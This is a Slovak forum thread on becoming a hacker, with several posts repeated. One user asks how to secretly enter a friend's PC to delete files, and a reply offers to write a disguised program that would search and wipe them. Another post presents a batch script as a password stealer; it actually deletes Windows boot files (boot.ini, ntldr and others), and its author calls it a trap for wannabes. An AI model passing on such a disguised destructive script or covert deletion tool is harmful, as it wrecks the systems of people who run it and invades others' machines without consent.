Ako sa stať hackerom - podrobný návod
-
tomaxx_199
Medium Professional
Re: Ako sa stať hackerom - podrobný návod
existuje nejaky kurz ,,mlady a nebezpecny hacker"??? a ako dlho trva aby som sa naucil hackerovat?
-
javatar
Hardcore addict
cely zivot a ani tak to nemusis vediet
-
slipknot1506
Light Star
Re: konecne
Ferdipondus napísal:este ze sa nasla tema kde sa da niecdo naucit, sory ale keby sa vam dalo poslat nejake exploiti na moju maijlovu adresu bo som neskuseny v prenikani do cudzich pocitacov a moja ucitelka (neuveritelna p**a) ma nevie uz nic naucit. bol by som velmi stastni1 keby ste mi poslali nejake linky kde by sa dalo naucit hackovat alebo keby ste mi poslali navod ako sa da zist1t heslo @dm1na vo winxp. dakujem velm1 pekne.
Čaute, je tu jeden problém a to taký, že by som sa potreboval dostať do PC jedného človeka, ktorý odo mňa dostal nejaké citlivé súbory, ktoré som mu omylom poslal a nechce ich zmazať. Je nejaká šanca, že by som sa dokázal dostať k nemu do PC bez toho aby o tom vedel, nájsť tie súbory a zmazať ich?
Je nejaká šanca aj keď nemám skoro žiadne skúsenosti s programovaním a podobnými vecami? Dosť by mi to pomohlo, keďže sú to fakt citlivé informácie pre mňa.
Za odpoveď ďakujem
Je nejaká šanca aj keď nemám skoro žiadne skúsenosti s programovaním a podobnými vecami? Dosť by mi to pomohlo, keďže sú to fakt citlivé informácie pre mňa.
Za odpoveď ďakujem
-
audiotrack
VIP
- Kontaktovať používateľa:
A keby sa mi podarilo mu poslať nejaký súbor s ktorým by som nejak získal prístup do jeho PC?
Nejaký spôsob, akýkoľvek, predsa musí byť, nie?
Nejaký spôsob, akýkoľvek, predsa musí byť, nie?
je, ale bez predchadzaujich skusenosti s programovanim napr. vo Visual Studiu apod. to nejde. Ten súbor tam samozrejme musí byť. Okrem toho je ešte aj iný spôsob - nájsť si nekoho takého a zaplatiť mu nejaky cash.
No, takže mi ostáva asi len študovať, alebo ho nejak oklamať aby som sa mu tam dostal tak, že by o tom vedel ale netušil by čo to je - to bude asi nemožné. To s tým platením nepôjde, nechcem aby tie informácie videl ešte niekto iný a navyše ten človek je v podstate kamoš, nechcem mu zle. 
-
audiotrack
VIP
keď je v podstate kamoš, tak ich nikomu neukáže a iba ťa provokuje. Prestaň hrať jeho hru, a rob sa že ti je to ukradnuté aby mal pocit že nemá žiaden tromf v rukáve. Technicky je mu ich zmazať bez toho aby to vedel takmer nemožné. Pozerávaš veľa filmov, ale musíš si uvedomiť že tí najlepší programátori zarábajú tesície eur mesačne aby robil softvér maximálne bezpečným a ak tam nejaká chyba je, tak ju málokedy niekto objaví a aj po tom je opravená behom chvíle. Vôbec to nie je ako vo filmoch kde sa za 2 minúty dostaneš do pentagonu
-
javatar
Hardcore addict
mozem vediet kolko tych suborov je? (a pribliznu velkost)
ono suhlasim s ostatnymi - dostat sa mu cez dialku do PC a stiahnut mu subory by bola trosku ina kava, najlepsi sposob ako sa niekomu naburat do PC bol asi popisany v tomto poste http://www.hojko.com/post1538534.html#p1538534
lenze - ty sa nepotrebujes dostat do jeho PC, ty len potrebujes aby ti to zmazal -> ak je tvoj kamos dostatocne hlupy aby si ho neakym sposobom prinutil nieco spustit na PC (pokojne to schovajme do neakej trapnej aplikacia alebo mu skusis poslat ci ti toto ide, lebo mne to hlasi chybu) mozem ti (samozrejme ak dodas dodatocne informacie) napisat program ktory po spusteni prehlada disk a ked najde to co ma tak to zmaze... len tu su mozne komplikacie ak je toho vela ze si vsimne zataz disku atd...
ono suhlasim s ostatnymi - dostat sa mu cez dialku do PC a stiahnut mu subory by bola trosku ina kava, najlepsi sposob ako sa niekomu naburat do PC bol asi popisany v tomto poste http://www.hojko.com/post1538534.html#p1538534
lenze - ty sa nepotrebujes dostat do jeho PC, ty len potrebujes aby ti to zmazal -> ak je tvoj kamos dostatocne hlupy aby si ho neakym sposobom prinutil nieco spustit na PC (pokojne to schovajme do neakej trapnej aplikacia alebo mu skusis poslat ci ti toto ide, lebo mne to hlasi chybu) mozem ti (samozrejme ak dodas dodatocne informacie) napisat program ktory po spusteni prehlada disk a ked najde to co ma tak to zmaze... len tu su mozne komplikacie ak je toho vela ze si vsimne zataz disku atd...
Re:
TROLCO napísal:ahoj ja chcem byt hacker a potrbujem info v mne zrozmitelnom jazyku tz slovensky cesky atd..moze mi niekto hodit link kde je napisany strucny navod ako sa stat hackerom aby som tomu rozumel aj ja mam len zakladne znalosti pc...
edit co je to phbpp?
AKože chlapec ty si ma pekne pobavil teda...
Ja mam za sebou SOS informačných technológií.. a dva semetre na Mandelaiovej univerzite v Brne- Informatika- robotika.. O Pc.. už viem dosť vecí.. a nedovolím sa nazývať sa hackerom.. ..
A nie ty čo vieč ledva Pc zapnúť...
Thats all..
PS: PHPbb je open source systém diskusného fóra napísaný v jazyku PHP. Je prispôsobiteľný pomocou štýlov a lokalizovaný do množstva jazykov. Na fungovanie vyžaduje HTTP server s podporou PHP a databázový systém.
A pre všetkých:
Majmä pod vplyvom médii a rôznych filmov vznikol okolo hackerov akýsi tajomný závoj mýtov, poloprávd a nepresností. V ich svetle je hacker vykresľovaný ako nadpriemerne inteligená bytosť vybavená niekoľkými klávesnicami a monitormi, na ktorých sa zjavujú čudesné znaky a procedúry podfarbené grafickými efektami na holywoodsky štýl, pričom úlohou hackera je preniknúť do inej počítačovej siete, rozbiť šifru alebo zničiť server/y - najlepšie vojenskej siete a to všetko je okorenené zúfalo krátkym časom a priloženou pištoľou k hlave hackera.
No skutočnosť je úplne iná. Je nutno rozlišovať medzi hackerom a crackerom. To, čo delí tieto dva svety je len tenká čiara charakteru, slušnosti a etikety. Hacker i Cracker je človek nadpriemerne vybavený vedomostami a skúsenosťami, ktorý vidí do danej problematiky viac ako ostatní a tejto výhody dokáže využiť.
Zatiaľ co hacker sa snaźi o lepší chod systémov, poukazuje na bezpečnostné chyby na ktoré upozorňuje nedeštruktívnym spôsobom. Cracker zneužíva svoje vedomosti a chyby v systémoch na krádež dát, obmedzenie činnosti či celkové znefunkčnenie systému.
Tu je pre ilustráciu príklad:
Hacker prenikne do iného počitača, servera, či siete a po snahe o zmazanie stôp o prieniku zanechá užívateľovi či administrátorovi dobre viditeľný odkaz možno aj s popisom chyby, no chybu/y nezneužije i keď si o to admin priam koleduje.
Cracker prenikne do iného počitača, servera, či siete a po snahe o zmazanie stôp o prieniku, ukradne či vymaže data, poprípade nainštaluje trójskeho koňa, aby získal zadné dvierka.
Script Kiddie alebo lamer, či slengovo lama. Má len minimálne alebo žiadne znalosti fungovania systému. Pre lamera nie je dôležité ako to funguje. Je len doležité násť na internete program /exploit/ a v ňom kliknúť na to správne tlačidlo, či napísať do príkazoveho riadku ten správny parameter a dúfa, že takto "hackne" server.
lamer91 - Ked si taky vzdelany, tak by si mohol byt aspon presnejsi. HTTP server pochadza mozno tak od projektu Apache, ktory to ma v nazve. Pritom HTTP je protokol. Spravne by malo byt uvedene, ze sa jedna o web server.
Tuším jedno príslovie hovorí "Humanum est errare" teda Mýliť sa je ľudské... Tak prepáč, že som sa sekol...test napísal:lamer91 - Ked si taky vzdelany, tak by si mohol byt aspon presnejsi. HTTP server pochadza mozno tak od projektu Apache, ktory to ma v nazve. Pritom HTTP je protokol. Spravne by malo byt uvedene, ze sa jedna o web server.
Ale ďakujem za opravu...
-
audiotrack
VIP
no až na to že je to errare humanum est 
Lamer
S tvojim príspevkom sa úplne stotožňujem.Akoby si mi myšlienky čítal.Ešte by som len dodal:
“Remember, the problem is not that people are stupid; the problem is that modems are cheap.” — Vince Sabio.
Jednoducho povedané...sprostí ľudia ktorí sa kedysi vysmievali nadšencom, po rokoch zistili, že sa PC dá využívať aj nimi (aj keď k tomu potrebujú jednoduché GUI, inak by sa z miesta nepohli a úplne blbovzdorné programy a mnohí z nich sú ešte aj tak stratení) a výsledkom je že na nete pobehuje ohromné množstvo retardov.Osobne neviem či sa mám smiať alebo plakať keď sa niekto spýta ako zistím heslo tam a tam.
//A autorovi témy radím nech si miesto svojho "hackovania" (zámerne úvodzovky keď už dnes nevedia rozoznať ani hacking od crackingu...) ide radšej háčkovať.Možno si aspoň upletie nejakú peknú čiapicu a nebude mu tak ťahať na mozog.
Aha a pre všetkých ktorí chcú heslá z pokecu,fb atď. toto musíte vyskúšať!!!
Otvorte si notepad skopírujte si toto
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
a uložte to ako hacker.bat
Teraz si súbor spustite a už len zadajte meno obete.Zaručene funkčné!
S tvojim príspevkom sa úplne stotožňujem.Akoby si mi myšlienky čítal.Ešte by som len dodal:
“Remember, the problem is not that people are stupid; the problem is that modems are cheap.” — Vince Sabio.
Jednoducho povedané...sprostí ľudia ktorí sa kedysi vysmievali nadšencom, po rokoch zistili, že sa PC dá využívať aj nimi (aj keď k tomu potrebujú jednoduché GUI, inak by sa z miesta nepohli a úplne blbovzdorné programy a mnohí z nich sú ešte aj tak stratení) a výsledkom je že na nete pobehuje ohromné množstvo retardov.Osobne neviem či sa mám smiať alebo plakať keď sa niekto spýta ako zistím heslo tam a tam.
//A autorovi témy radím nech si miesto svojho "hackovania" (zámerne úvodzovky keď už dnes nevedia rozoznať ani hacking od crackingu...) ide radšej háčkovať.Možno si aspoň upletie nejakú peknú čiapicu a nebude mu tak ťahať na mozog.
Aha a pre všetkých ktorí chcú heslá z pokecu,fb atď. toto musíte vyskúšať!!!
Otvorte si notepad skopírujte si toto
@echo off
a uložte to ako hacker.bat
Teraz si súbor spustite a už len zadajte meno obete.Zaručene funkčné!
Re: Re:
Suhlasim s tebou, a este si nedopisal, kolko zelatinovych cukrikov hackeri pojedialamer91 napísal:
Majmä pod vplyvom médii a rôznych filmov vznikol okolo hackerov akýsi tajomný závoj mýtov, poloprávd a nepresností. V ich svetle je hacker vykresľovaný ako nadpriemerne inteligená bytosť vybavená niekoľkými klávesnicami a monitormi, na ktorých sa zjavujú čudesné znaky a procedúry podfarbené grafickými efektami na holywoodsky štýl, pričom úlohou hackera je preniknúť do inej počítačovej siete, rozbiť šifru alebo zničiť server/y - najlepšie vojenskej siete a to všetko je okorenené zúfalo krátkym časom a priloženou pištoľou k hlave hackera.
neviem ci toto nieje v rozpore s pravidlami fora. Osobne si myslim, ze by stacilo nainstalovat keylogger@echo off
Ferdo, hlavne ten script nespúšťaj...šlo mi o to že wannabes by si to hneď celý nadšení pustili...čakalo by ich však nepríjemné prekvapenie.Komukoľvek so základnými znalosťami ak sa tejto oblasti venuje dôjde načo slúži
Ak nie a len blbo robí všetko čo niekde nájde tak smola.
-
vladenko007
VIP
zeky
to je jedno taketo veci tu radšej nedávaj chodí tu vela ludí ktorí tomu absolutne nerozumejú. Chodia si tu aj pre uplne banálne rady. A ked im tu napíšeš blbosť že im to ukáže heslá na pokec alebo facebok tak to budú skúšať.
im napriklad del c:\boot.ini nič nepovie ale kto im má zas davať dohromady OS
Už to mi niekedy robí nervy že sa stalé dookola pýtajú ako sa inštaluje win napriek tomu že tu je o tom milion príspevkov.
to je jedno taketo veci tu radšej nedávaj chodí tu vela ludí ktorí tomu absolutne nerozumejú. Chodia si tu aj pre uplne banálne rady. A ked im tu napíšeš blbosť že im to ukáže heslá na pokec alebo facebok tak to budú skúšať.
im napriklad del c:\boot.ini nič nepovie ale kto im má zas davať dohromady OS
Už to mi niekedy robí nervy že sa stalé dookola pýtajú ako sa inštaluje win napriek tomu že tu je o tom milion príspevkov.
Práve tých sa snažím naučiť aspoň trocha rozmýšľať, aby neboli takí hlúpi, že robia všetko čo niekde vidia aj keď nemajú o tom ani šajn.A myslím že ak niekto natoľko nerešpektuje súkromie ostatných že by im chcel liezť na účty tak si deletnutý OS aj zaslúži aby nad sebou porozmýšľal.A čo sa týka toho že niekto nevie do googlea hodiť "ako nainštalovať windows", tak k tomu nemám čo povedať.Buď lenivosť alebo dementnosť.Veď po nete sú stovky návodov textových, video návodov alebo návody s doslova každým jedným krokom a popisom k nemu.